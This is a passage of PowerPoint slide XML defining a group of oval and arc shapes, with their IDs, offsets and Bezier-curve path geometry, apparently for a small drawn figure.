                <p:cNvPr id="66791" name="Oval 1255">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{98BCE54A-E4FA-544E-A699-DF26B348E732}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>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2" name="Oval 1256">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EFB6E51E-13B3-B947-960A-6C48BC6116BE}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>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3" name="Oval 1257">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B98F120-083E-8A42-B3F7-BCA2FEF306E9}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>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4" name="Oval 1258">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49DB8E1F-68C3-3144-ACA7-F1FD8132F08B}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>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5" name="Oval 1259">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E425461F-A7BB-924B-8686-98F960463A21}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>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6" name="Oval 1260">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D570625-A5AC-5845-B7B2-F032E1EF6C04}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>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7" name="Oval 1261">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A2793ED-56F3-C342-A355-F4E6724FADAD}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>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8" name="Oval 1262">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F128192-3C32-184F-8200-D1910A63F458}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>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9" name="Oval 1263">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E4B6CF06-3A80-D845-AFE6-74D3CD2FC08B}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>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800" name="Group 1264">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{540E9F1D-6D20-F44C-BF8A-67E9306863D1}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="1223" y="2004"/>
                <a:ext cx="94" cy="56"/>
                <a:chOff x="1223" y="2004"/>
                <a:chExt cx="94" cy="56"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="66801" name="Arc 1265">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{66FD1A98-2C7E-BC4A-839F-4A73A25A41FC}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="1256" y="2004"/>
                  <a:ext cx="39" cy="12"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="G0" fmla="+- 20836 0 0"/>
                    <a:gd name="G1" fmla="+- 21600 0 0"/>
                    <a:gd name="G2" fmla="+- 21600 0 0"/>
                    <a:gd name="T0" fmla="*/ 0 w 41085"/>
                    <a:gd name="T1" fmla="*/ 15905 h 21600"/>
                    <a:gd name="T2" fmla="*/ 41085 w 41085"/>
                    <a:gd name="T3" fmla="*/ 14080 h 21600"/>
                    <a:gd name="T4" fmla="*/ 20836 w 41085"/>
                    <a:gd name="T5" fmla="*/ 21600 h 21600"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="41085" h="21600" fill="none" extrusionOk="0">
                      <a:moveTo>
                        <a:pt x="0" y="15905"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="2567" y="6513"/>
                        <a:pt x="11099" y="0"/>
                        <a:pt x="20836" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="29864" y="0"/>
                        <a:pt x="37941" y="5615"/>
                        <a:pt x="41084" y="14080"/>
                      </a:cubicBezTo>
                    </a:path>
                    <a:path w="41085" h="21600" stroke="0" extrusionOk="0">
                      <a:moveTo>
                        <a:pt x="0" y="15905"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="2567" y="6513"/>
                        <a:pt x="11099" y="0"/>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2" name="Arc 1266">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0CC556EC-8746-5A47-8645-1E6203B7BE95}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="1257" y="2005"/>
                  <a:ext cx="37" cy="11"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="G0" fmla="+- 20780 0 0"/>
                    <a:gd name="G1" fmla="+- 21600 0 0"/>
                    <a:gd name="G2" fmla="+- 21600 0 0"/>
                    <a:gd name="T0" fmla="*/ 0 w 40935"/>
                    <a:gd name="T1" fmla="*/ 15706 h 21600"/>
                    <a:gd name="T2" fmla="*/ 40935 w 40935"/>
                    <a:gd name="T3" fmla="*/ 13833 h 21600"/>
                    <a:gd name="T4" fmla="*/ 20780 w 40935"/>
                    <a:gd name="T5" fmla="*/ 21600 h 21600"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="40935" h="21600" fill="none" extrusionOk="0">
                      <a:moveTo>
                        <a:pt x="-1" y="15705"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="2635" y="6413"/>
                        <a:pt x="11120" y="0"/>
                        <a:pt x="20780" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="29712" y="0"/>
                        <a:pt x="37723" y="5498"/>
                        <a:pt x="40935" y="13832"/>
                      </a:cubicBezTo>
                    </a:path>
                    <a:path w="40935" h="21600" stroke="0" extrusionOk="0">
                      <a:moveTo>
                        <a:pt x="-1" y="15705"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="2635" y="6413"/>
                        <a:pt x="11120" y="0"/>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sz="1797" dirty="0"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="66803" name="Arc 1267">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F95CD41-C79B-564D-99A4-95BA41DA06AA}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="1233" y="2010"/>
                  <a:ext cx="23" cy="14"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="G0" fmla="+- 21600 0 0"/>
                    <a:gd name="G1" fmla="+- 21600 0 0"/>
                    <a:gd name="G2" fmla="+- 21600 0 0"/>
                    <a:gd name="T0" fmla="*/ 454 w 33372"/>
                    <a:gd name="T1" fmla="*/ 26005 h 26005"/>
                    <a:gd name="T2" fmla="*/ 33372 w 33372"/>
                    <a:gd name="T3" fmla="*/ 3490 h 26005"/>
                    <a:gd name="T4" fmla="*/ 21600 w 33372"/>
                    <a:gd name="T5" fmla="*/ 21600 h 26005"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="33372" h="26005" fill="none" extrusionOk="0">
                      <a:moveTo>
                        <a:pt x="453" y="26005"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="152" y="24556"/>
                        <a:pt x="0" y="23080"/>
                        <a:pt x="0" y="21600"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="9670"/>
                        <a:pt x="9670" y="0"/>
                        <a:pt x="21600" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="25779" y="0"/>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4" name="Arc 1268">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CFC0C5CD-F692-044C-9DC0-029D03270AA5}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="1234" y="2011"/>
                  <a:ext cx="22" cy="13"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="G0" fmla="+- 21600 0 0"/>
                    <a:gd name="G1" fmla="+- 21600 0 0"/>
                    <a:gd name="G2" fmla="+- 21600 0 0"/>
                    <a:gd name="T0" fmla="*/ 470 w 33223"/>
                    <a:gd name="T1" fmla="*/ 26082 h 26082"/>
                    <a:gd name="T2" fmla="*/ 33223 w 33223"/>
                    <a:gd name="T3" fmla="*/ 3394 h 26082"/>
                    <a:gd name="T4" fmla="*/ 21600 w 33223"/>
                    <a:gd name="T5" fmla="*/ 21600 h 26082"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="33223" h="26082" fill="none" extrusionOk="0">
                      <a:moveTo>
                        <a:pt x="470" y="26081"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="157" y="24608"/>
                        <a:pt x="0" y="23106"/>
                        <a:pt x="0" y="21600"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="9670"/>
                        <a:pt x="9670" y="0"/>
                        <a:pt x="21600" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="25718" y="0"/>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805" name="Arc 1269">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6CA01B5E-5B72-DF47-BA5E-F2896AA81033}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="1229"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6" name="Arc 1270">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{24259889-CE6D-DF42-9F2B-918D4A720DC9}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="1230"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807" name="Arc 1271">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C8E24C0-C6D7-B846-9F5B-55396B00A8C0}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="1294" y="2010"/>
                  <a:ext cx="19" cy="14"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="G0" fmla="+- 4386 0 0"/>
                    <a:gd name="G1" fmla="+- 21600 0 0"/>
                    <a:gd name="G2" fmla="+- 21600 0 0"/>
                    <a:gd name="T0" fmla="*/ 0 w 25986"/>
                    <a:gd name="T1" fmla="*/ 450 h 33449"/>
                    <a:gd name="T2" fmla="*/ 22446 w 25986"/>
                    <a:gd name="T3" fmla="*/ 33449 h 33449"/>
                    <a:gd name="T4" fmla="*/ 4386 w 25986"/>
                    <a:gd name="T5" fmla="*/ 21600 h 33449"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="25986" h="33449" fill="none" extrusionOk="0">
                      <a:moveTo>
                        <a:pt x="-1" y="449"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="1442" y="150"/>
                        <a:pt x="2912" y="0"/>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0"/>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8" name="Arc 1272">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CF8582F6-63B4-BC40-A32D-34BEDD9F560D}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="1294" y="2011"/>
                  <a:ext cx="17" cy="13"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="G0" fmla="+- 4176 0 0"/>
                    <a:gd name="G1" fmla="+- 21600 0 0"/>
                    <a:gd name="G2" fmla="+- 21600 0 0"/>
                    <a:gd name="T0" fmla="*/ 0 w 25776"/>
                    <a:gd name="T1" fmla="*/ 407 h 33873"/>
                    <a:gd name="T2" fmla="*/ 21951 w 25776"/>
                    <a:gd name="T3" fmla="*/ 33873 h 33873"/>
                    <a:gd name="T4" fmla="*/ 4176 w 25776"/>
                    <a:gd name="T5" fmla="*/ 21600 h 33873"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="25776" h="33873" fill="none" extrusionOk="0">
                      <a:moveTo>
                        <a:pt x="0" y="407"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="1375" y="136"/>
                        <a:pt x="2774" y="0"/>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0"/>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sz="1797" dirty="0"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="66809" name="Arc 1273">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A6E4C5AD-6C77-CE44-8250-16E43D93B423}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="1300" y="2024"/>
                  <a:ext cx="17" cy="14"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="G0" fmla="+- 0 0 0"/>
                    <a:gd name="G1" fmla="+- 17217 0 0"/>
                    <a:gd name="G2" fmla="+- 21600 0 0"/>
                    <a:gd name="T0" fmla="*/ 13043 w 21600"/>
                    <a:gd name="T1" fmla="*/ 0 h 30094"/>
                    <a:gd name="T2" fmla="*/ 17342 w 21600"/>
                    <a:gd name="T3" fmla="*/ 30094 h 30094"/>
                    <a:gd name="T4" fmla="*/ 0 w 21600"/>
                    <a:gd name="T5" fmla="*/ 17217 h 30094"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>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0" name="Arc 1274">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81B94DAD-D030-3C48-9B43-6C49351B8AD5}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="1300" y="2025"/>
                  <a:ext cx="16" cy="13"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="G0" fmla="+- 0 0 0"/>
                    <a:gd name="G1" fmla="+- 17481 0 0"/>
                    <a:gd name="G2" fmla="+- 21600 0 0"/>
                    <a:gd name="T0" fmla="*/ 12688 w 21600"/>
                    <a:gd name="T1" fmla="*/ 0 h 30713"/>
                    <a:gd name="T2" fmla="*/ 17073 w 21600"/>
                    <a:gd name="T3" fmla="*/ 30713 h 30713"/>
                    <a:gd name="T4" fmla="*/ 0 w 21600"/>
                    <a:gd name="T5" fmla="*/ 17481 h 30713"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>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sz="1797" dirty="0"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="66811" name="Arc 1275">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9B86C35-C0AC-8440-B42A-FA7979E45A41}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="1294" y="2037"/>
                  <a:ext cx="20" cy="19"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="G0" fmla="+- 6631 0 0"/>
                    <a:gd name="G1" fmla="+- 6233 0 0"/>
                    <a:gd name="G2" fmla="+- 21600 0 0"/>
                    <a:gd name="T0" fmla="*/ 27312 w 28231"/>
                    <a:gd name="T1" fmla="*/ 0 h 27833"/>
                    <a:gd name="T2" fmla="*/ 0 w 28231"/>
                    <a:gd name="T3" fmla="*/ 26790 h 27833"/>
                    <a:gd name="T4" fmla="*/ 6631 w 28231"/>
                    <a:gd name="T5" fmla="*/ 6233 h 27833"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>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2" name="Arc 1276">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{937EA612-EECB-F14D-8B42-FC770C7D6EA6}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="1295" y="2037"/>
                  <a:ext cx="19" cy="18"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="G0" fmla="+- 6617 0 0"/>
                    <a:gd name="G1" fmla="+- 6246 0 0"/>
                    <a:gd name="G2" fmla="+- 21600 0 0"/>
                    <a:gd name="T0" fmla="*/ 27294 w 28217"/>
                    <a:gd name="T1" fmla="*/ 0 h 27846"/>
                    <a:gd name="T2" fmla="*/ 0 w 28217"/>
                    <a:gd name="T3" fmla="*/ 26807 h 27846"/>
                    <a:gd name="T4" fmla="*/ 6617 w 28217"/>
                    <a:gd name="T5" fmla="*/ 6246 h 27846"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>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sz="1797" dirty="0"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="66813" name="Arc 1277">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A4382F6-4A10-8944-ADAD-7C1C97A3F645}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="1223" y="2024"/>
                  <a:ext cx="10" cy="17"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="G0" fmla="+- 21600 0 0"/>
                    <a:gd name="G1" fmla="+- 21582 0 0"/>
                    <a:gd name="G2" fmla="+- 21600 0 0"/>
                    <a:gd name="T0" fmla="*/ 13091 w 21600"/>
                    <a:gd name="T1" fmla="*/ 41436 h 41436"/>
                    <a:gd name="T2" fmla="*/ 20717 w 21600"/>
                    <a:gd name="T3" fmla="*/ 0 h 41436"/>
                    <a:gd name="T4" fmla="*/ 21600 w 21600"/>
                    <a:gd name="T5" fmla="*/ 21582 h 41436"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="21600" h="41436" fill="none" extrusionOk="0">
                      <a:moveTo>
                        <a:pt x="13091" y="41435"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="5149" y="38031"/>
                        <a:pt x="0" y="30222"/>
                        <a:pt x="0" y="21582"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="9996"/>
                        <a:pt x="9140" y="473"/>
                        <a:pt x="20717" y="0"/>
                      </a:cubicBezTo>
                    </a:path>
                    <a:path w="21600" h="41436" stroke="0" extrusionOk="0">
                      <a:moveTo>
                        <a:pt x="13091" y="41435"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="5149" y="38031"/>
                        <a:pt x="0" y="30222"/>
                        <a:pt x="0" y="21582"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0"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4" name="Arc 1278">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{17D708B4-183B-0C43-B828-936C20A2AFE7}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="1224" y="2025"/>
                  <a:ext cx="9" cy="15"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="G0" fmla="+- 21600 0 0"/>
                    <a:gd name="G1" fmla="+- 21582 0 0"/>
                    <a:gd name="G2" fmla="+- 21600 0 0"/>
                    <a:gd name="T0" fmla="*/ 13180 w 21600"/>
                    <a:gd name="T1" fmla="*/ 41473 h 41473"/>
                    <a:gd name="T2" fmla="*/ 20728 w 21600"/>
                    <a:gd name="T3" fmla="*/ 0 h 41473"/>
                    <a:gd name="T4" fmla="*/ 21600 w 21600"/>
                    <a:gd name="T5" fmla="*/ 21582 h 41473"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="21600" h="41473" fill="none" extrusionOk="0">
                      <a:moveTo>
                        <a:pt x="13179" y="41473"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="5190" y="38091"/>
                        <a:pt x="0" y="30257"/>
                        <a:pt x="0" y="21582"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="9991"/>
                        <a:pt x="9147" y="467"/>
                        <a:pt x="20727" y="-1"/>
                      </a:cubicBezTo>
                    </a:path>
                    <a:path w="21600" h="41473" stroke="0" extrusionOk="0">
                      <a:moveTo>
                        <a:pt x="13179" y="41473"/>
                      </a:moveTo>
                      <a:cubicBezTo>
